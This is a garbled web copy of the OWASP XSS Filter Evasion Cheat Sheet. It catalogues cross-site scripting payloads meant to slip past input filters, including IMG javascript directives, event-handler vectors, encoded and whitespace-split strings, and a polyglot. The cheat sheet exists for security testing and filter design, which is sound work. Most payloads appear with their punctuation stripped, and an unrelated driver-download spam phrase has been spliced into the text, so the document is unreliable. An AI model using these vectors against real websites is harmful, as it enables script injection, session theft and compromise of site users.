That site now redirects to its new home here, where we plan to maintain and enhance it. The very first OWASP Prevention Cheat Sheet, the XSS Cross Site Scripting Prevention Cheat Sheet, was inspired by RSnakes XSS Cheat Sheet, so we can thank him for our inspiration. We wanted to create short, simple guidelines that developers could follow to prevent XSS, rather than simply telling developers to build apps that could protect against all the fancy tricks specified in rather complex attack cheat sheet, and so the OWASP Cheat Sheet Series was born. Tests. This cheat sheet is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. Please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the scripts. XSS Locator. Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word XSS will pop up. Use this URL encoding calculator to encode the entire string. Tip if youre in a rush and need to quickly check a page, often times injecting the depreciated lt PLAINTEXT tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably. String. from. Char. Code8. 8,8. 3,8. String. Char. Code8. 8,8. String. from. Char. Code8. 8,8. 3,8. String. Char. Code8. 8,8. SCRIPT lt SCRIPT alertString. Char. Code8. 8,8. SCRIPT. XSS Locator shortIf you dont have much space and know there is no vulnerable Java. Script on the page, this string is a nice compact XSS injection check. View source after injecting it and look for lt XSS versus lt XSS to see if it is vulnerable. XSS. No Filter Evasion. This is a normal XSS Java. Script injection, and most likely to get caught but I suggest trying it first the quotes are not required in any modern browser so they are omitted here. SCRIPT SRChttp xss. SCRIPT. Filter bypass based polyglot lt marquee lt img srcx onerrorconfirm1 lt marquee lt plaintext lt lt plaintextonmouseoverprompt1. XSS typesubmit lt script. Image XSS using the Java. Script directive. Image XSS using the Java. Script directive IE7. Java. Script directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well. IMG SRCjavascript alertXSS. No quotes and no semicolonlt IMG SRCjavascript alertXSS. Case insensitive XSS attack vectorlt IMG SRCJa. Va. Sc. Ri. Pt alertXSS. HTML entities. The semicolons are required for this to work. IMG SRCjavascript alert quot XSS quot. Grave accent obfuscation. If you need to use both double and single quotes you can use a grave accent to encapsulate the Java. Script string this is also useful because lots of cross site scripting filters dont know about grave accents. IMG SRCjavascript alertRSnake says, XSS. Malformed A tags. Skip the HREF attribute and get to the meat of the XXS. Submitted by David Cross Verified on Chrome. Chrome loves to replace missing quotes for you. Chrome will put them in the right place and fix your missing quotes on a URL or script. Malformed IMG tags. Originally found by Begeek but cleaned up and shortened to work in all browsers, this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag. IMG lt SCRIPT alertXSSlt SCRIPT. Char. Code. If no quotes of any kind are allowed you can eval a from. Char. Code in Java. Script to create any XSS vector you need. IMG SRCjavascript alertString. Char. Code8. 8,8. Default SRC tag to get past filters that check SRC domain. This will bypass most SRC domain filters. Inserting javascript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted like onblur, onclick giving you an extensive amount of variations for many injections listed here. Submitted by David Cross. Edited by Abdullah HussamAbdulahhusam. IMG SRC onmouseoveralertxxs. Default SRC tag by leaving it emptylt IMG SRC onmouseoveralertxxs. Default SRC tag by leaving it out entirelylt IMG onmouseoveralertxxs. On error alertlt IMG SRC onerroralertString. Char. Code8. 8,8. IMG onerror and javascript alert encodelt img srcx onerror 0. Decimal HTML character referencesall of the XSS examples that use a javascript directive inside of an lt IMG tag will not work in Firefox or Netscape 8. Gecko rendering engine mode. IMG SRC 1. Decimal HTML character references without trailing semicolons. Broadcom Netxtreme Gigabit Ethernet Xp Driver Dell there. This is often effective in XSS that attempts to look for XX, since most people dont know about padding up to 7 numeric characters total. This is also useful against people who decode against strings like tmpstring s. Ive seen this in the wild. IMG SRC 0. Hexadecimal HTML character references without trailing semicolons. This is also a viable XSS attack against the above string tmpstring s. HTML characters. IMG SRC x. A x. 61 x. A x. 61 x. C x. 65 x. Embedded tab. Used to break up the cross site scripting attack. IMG SRCjavascript alertXSS. Embedded Encoded tab. Use this one to break up XSS . IMG SRCjav x. XSS. Embedded newline to break up XSSSome websites claim that any of the chars 0. That is incorrect. Only 0. 9 horizontal tab, 1. See the ascii chart for more details. The following four XSS examples illustrate this vector. IMG SRCjav x. A ascript alertXSS. Embedded carriage return to break up XSSNote with the above I am making these strings longer than they have to be because the zeros could be omitted. Often Ive seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1 7 characters. IMG SRCjav x. D ascript alertXSS. Null breaks up Java. Script directive. Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use 0. URL string or if you want to write your own injection tool you can either use vim V will produce a null or the following program to generate it into a text file. Okay, I lied again, older versions of Opera circa 7. Windows were vulnerable to one additional char 1. But the null char 0. IMG SRCjava0script alertXSS out. Spaces and meta chars before the Java.